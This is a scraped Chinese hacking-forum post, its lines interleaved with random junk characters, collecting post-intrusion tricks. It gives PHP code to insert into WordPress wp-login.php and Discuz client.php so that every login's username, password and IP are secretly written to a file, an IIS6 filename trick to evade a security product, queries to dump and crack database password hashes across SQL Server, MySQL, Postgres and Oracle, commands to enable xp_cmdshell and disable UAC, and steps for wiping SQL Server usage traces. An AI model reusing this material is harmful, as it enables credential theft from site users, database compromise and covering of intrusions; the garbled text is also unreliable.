6 G6 `% T0 [5 h! c4 I$ W$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;( \2 t9 n' n  q0 x5 {4 c. u' G  j
$txt=$txt.”\r\n”;6 Y- I$ Y$ X+ {3 c. i
if($log_user&&$log_pwd&&$log_ip){
/ w4 L' ~7 ]9 |; k  k7 R" X8 q@fwrite(fopen(‘pwd.txt’,”a+”),$txt);. U: B, \- x$ r
}# ^% r$ I+ K# u" j
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。. }# K' ]9 M; @  u
就是搜索case ‘login’
4 |: r- I, k6 e2 r在它下面直接插入即可,记录的密码生成在pwd.txt中,6 o9 Q" H; l& O7 P
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录8 P* e) [4 O' f% f
利用II6文件解析漏洞绕过安全狗代码:* I. C$ l$ ]2 Q1 W0 z
;antian365.asp;antian365.jpg' N% X+ P# G# L% Y$ g; d: X
' Y" O- v( T. l
各种类型数据库抓HASH破解最高权限密码!
" m4 m7 p, z3 Q6 N7 ?; a1.sql server20004 O' p7 t0 C: O7 h5 _0 v' i3 r
SELECT password from master.dbo.sysxlogins where name='sa'; B; {. r$ N2 N$ ?1 k8 K9 I; g. O
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
0 D: {$ D1 y; g. G3 \5 {. m2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
+ N6 ~- t+ }* D; k# X6 C  [, \4 p* Q8 o/ }; j/ W
0×0100- constant header
8 v$ c" {( T( b. U9 ?" y34767D5C- salt' i* n+ C+ {* p* G4 I
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
! G9 H0 _/ a) E5 p' t2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash) z# V' L6 h4 N- s8 G! j. w( i$ n
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash) r. w$ c! X" r, C: y
SQL server 2005:-
$ k, t3 k( Q! R" b& ISELECT password_hash FROM sys.sql_logins where name='sa'
$ c4 x0 [8 O% e0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0 O% n; ?" B- p1 m! m# M0×0100- constant header
  Z( A& G: g  p0 G993BF231-salt
: o# G! ^% H/ g7 f  K5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash" F- ~$ {2 q) u+ U0 m
crack case sensitive hash in cain, try brute force and dictionary based attacks.
! s1 w  j( m, z" t6 Q# v' p
+ }2 h8 E+ v/ f. z" }1 Supdate:- following bernardo’s comments:-0 x' j% x/ C; {4 R" `$ q
use function fn_varbintohexstr() to cast password in a hex string.* R2 j" Y( O+ m0 A% Q
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins. J$ d+ v( W  o& h9 g0 n' }6 `$ }

+ r' Z- K. f; i$ G5 b. NMYSQL:-
& @7 A- ^- k5 [3 x
1 a0 \- {& L$ HIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
  O' L" G8 P- D4 X# C1 i
, e( w6 R  c3 u, T7 o1 }& S, o*mysql  < 4.1  {. A/ x% Q1 X+ y! P* D& l! ~
. ~9 E6 Q: G/ q! O- ~5 Q& q& h
mysql> SELECT PASSWORD(‘mypass’);
5 y& e+ t( K, q$ j+——————–+
9 y: R9 o+ ?7 t# F7 f7 p1 q5 p| PASSWORD(‘mypass’) |
% R" P7 F/ j/ b+ f& T& ?+——————–+
8 \# g7 c2 n) w  o| 6f8c114b58f2ce9e   |
, h, _/ I' P+ R, Y# _/ L: x3 O+——————–+* d' f& n6 J9 d+ t

* s' d0 Y* h0 ]9 {9 Q# Y. [*mysql >=4.1
" _# M# U" D; c/ q# a; _: C' c
8 S4 D" S; e0 s- Lmysql> SELECT PASSWORD(‘mypass’);
; e: c* ?" G/ O$ F; g6 \) z3 }+——————————————-+& g% ~; @, G8 m! q$ P
| PASSWORD(‘mypass’)                        |
/ [* T6 V; m0 t7 b/ D1 B$ c/ J& E+——————————————-+
1 a3 _% t- M! n4 G: m( q. o: F| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |" D+ B' X% ~% ~2 {, j
+——————————————-+
" ~% H' v0 ?4 J! I; I. J
, r' q: ?% F  G1 x9 D0 c5 @( CSelect user, password from mysql.user& j* G$ \- H  v5 @5 }) `7 ^/ Q2 I
The hashes can be cracked in ‘cain and abel’
; D, [9 [. Z2 G" H" d, w! E! d4 V& G+ `  H
Postgres:-; F% T1 M% W1 X
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)- l, x3 r& y% {
select usename, passwd from pg_shadow;
/ O7 Y2 p% u7 e* Fusename      |  passwd
' W1 f$ [, @3 Z2 |——————+————————————-) X& m: k, E1 [, l
testuser            | md5fabb6d7172aadfda4753bf0507ed43968 |: H" Z) E, J$ y/ N& J; j
use mdcrack to crack these hashes:-
5 H# f, S2 X7 y6 A# Z$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
( t# I9 Q' B6 H  ]
# g4 L* `% B( ]" F, z9 COracle:-+ {9 N/ t& s6 Y" F7 w# {
select name, password, spare4 from sys.user$
+ c9 |. c1 t5 R7 M  L7 ?7 nhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
3 u% P& z) P- x7 ~  \7 qMore on Oracle later, i am a bit bored…./ H+ e* b  t: ~6 S; `- F
9 H8 o1 `4 e6 G: H' n. U
: T' v0 {' X" V
在sql server2005/2008中开启xp_cmdshell
( p  Q) }* K- U8 l! E. X-- To allow advanced options to be changed.) m: f4 c( W; v! @9 X6 `4 j
EXEC sp_configure 'show advanced options', 11 s' B2 k5 L# L& O+ M- }  H
GO
+ `! d9 t2 d: J* m- h-- To update the currently configured value for advanced options.
* u" ^% B- w- k" tRECONFIGURE. }8 L, e) M2 B, Z/ `: s* Z
GO9 Z2 P0 b+ r; b; \9 D' T+ O
-- To enable the feature.
' m/ t- r# w0 y; p' i; xEXEC sp_configure 'xp_cmdshell', 15 @* N" X- `0 H' i+ `
GO+ P6 P1 u) f4 s8 `5 L  d( }
-- To update the currently configured value for this feature.6 `$ R: l1 i8 ^  D7 v5 |/ W3 y8 j
RECONFIGURE
/ A6 i2 l+ ~2 d) ^. n) LGO; W  y5 }) O' G9 ?  x
SQL 2008 server日志清除,在清楚前一定要备份。
+ U6 A* J# l" O. f8 P( l/ g如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:* H0 l1 D9 O  X
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
2 ^3 m# C+ E% g8 }' A; u$ ^2 B4 I- T/ v( v
对于SQL Server 2008以前的版本:
( y- s  t) P4 _- I. CSQL Server 2005:
' Y/ d, Y0 |7 S) I4 h8 k删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
1 ]3 U7 K1 C  \, `# tSQL Server 2000:. v( N- z" M! _& X
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
+ [1 r/ s' R( m: n0 M" r1 l7 o1 Z, r  I
本帖最后由 simeon 于 2013-1-3 09:51 编辑
/ U# T. T3 K2 E$ T6 R( b  E1 K2 D% O9 P: k! n+ d
7 `# \/ d4 s. J. c2 Y. p5 F
windows 2008 文件权限修改
" y* [. J2 S4 d0 K$ S1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx; m, y% @& L3 l1 M" n
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
) E8 j% c, w! m0 q$ W4 ~一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,1 C! Z; L5 T. K1 {1 u

; @% b  w# l1 @& bWindows Registry Editor Version 5.00- d! p" d% \# t' _3 N- _; Y6 L
[HKEY_CLASSES_ROOT\*\shell\runas]/ m7 P3 t/ I$ Y5 w0 E; h6 h
@="管理员取得所有权"' j! F6 @: O7 e  A6 U8 ~' K
"NoWorkingDirectory"=""
" n* W2 B  F) o- W( ^: v9 R[HKEY_CLASSES_ROOT\*\shell\runas\command]
' g# h& d- l6 p' y& ]; C5 G@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 h6 c/ Y' A' Y  b; ~7 s5 b"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& B# L/ O5 D" _
[HKEY_CLASSES_ROOT\exefile\shell\runas2]  |+ o5 G( K9 J: {% V5 d' [
@="管理员取得所有权"
: D1 O* V, @7 V2 b, c+ F' D"NoWorkingDirectory"=""! b. m8 p0 N3 N4 V; G: D1 d
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]1 }  H' k! O* T& l+ @. Y
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" d3 A7 R1 M; Q9 J8 Q; {
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 ?+ P1 b) |) l7 G# R' S
3 B' _  N9 Q: o% x5 f0 \3 I
[HKEY_CLASSES_ROOT\Directory\shell\runas]8 E4 Y" V$ y' I  D
@="管理员取得所有权"1 I- t9 j. B- ~+ E2 B
"NoWorkingDirectory"=""9 }4 G: d/ [- o  n  |& @4 g5 ?3 Q
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]  j+ C/ j: N, A
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
+ O% v0 V$ ~7 h' L9 e6 o"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
4 I8 [! h8 w$ r- g# g
4 U2 E* d; U5 @3 U4 v5 {. n( e
" R+ |% A0 k' D" Y7 I# X1 uwin7右键“管理员取得所有权”.reg导入
2 b9 U6 U- n1 M! G二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
0 N6 X- w+ S% Z: H1、C:\Windows这个路径的“notepad.exe”不需要替换
$ W, v$ e& W5 N' I2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
% y$ |' G# ~7 `" p  `3、四个“notepad.exe.mui”不要管
/ N9 Z6 N1 |# g3 i8 x/ X" F* O4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和3 y3 o& X4 M. F8 ~8 i) n+ P2 B
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”/ a( L0 S1 D* T% E
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,. F& Y+ l2 o9 P$ h* b3 G6 T
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。6 i3 i$ S  l# m
windows 2008中关闭安全策略:
0 }" h. a0 S* N' k( treg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f; W# U# K0 x5 B8 p5 d
修改uc_client目录下的client.php 在
) C0 y  l/ y, @6 Lfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
! M% {# a% f( q4 e0 Q下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
. y& S- a0 G% J" l你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw* B4 h  }2 |7 S" @
if(getenv('HTTP_CLIENT_IP')) {
) A: l: c2 M7 {: h: E$onlineip = getenv('HTTP_CLIENT_IP');% q& y. b0 Z1 _* _% L
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
# D, f7 i' H: O' I! ^) i; ~9 ~3 u3 U8 L$onlineip = getenv('HTTP_X_FORWARDED_FOR');; I% O$ K! _# W
} elseif(getenv('REMOTE_ADDR')) {
9 P: m! F. R& G, ~3 A$onlineip = getenv('REMOTE_ADDR');8 I; n; p  j# v  Q4 a* g  J
} else {3 C* R& s0 l* F2 q4 d
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
* |! D$ d: e; w. Q! h. Q% g# D}
# y( f# n- O0 }5 j4 H5 d( t3 b. ]6 H     $showtime=date("Y-m-d H:i:s");! ?  I- z: B* W7 I- c
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
1 q  W) p  ^# t# Z    $handle=fopen('./data/cache/csslog.php','a+');: E4 {/ [5 v+ N/ N2 M) b; Y* Q
    $write=fwrite($handle,$record);
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表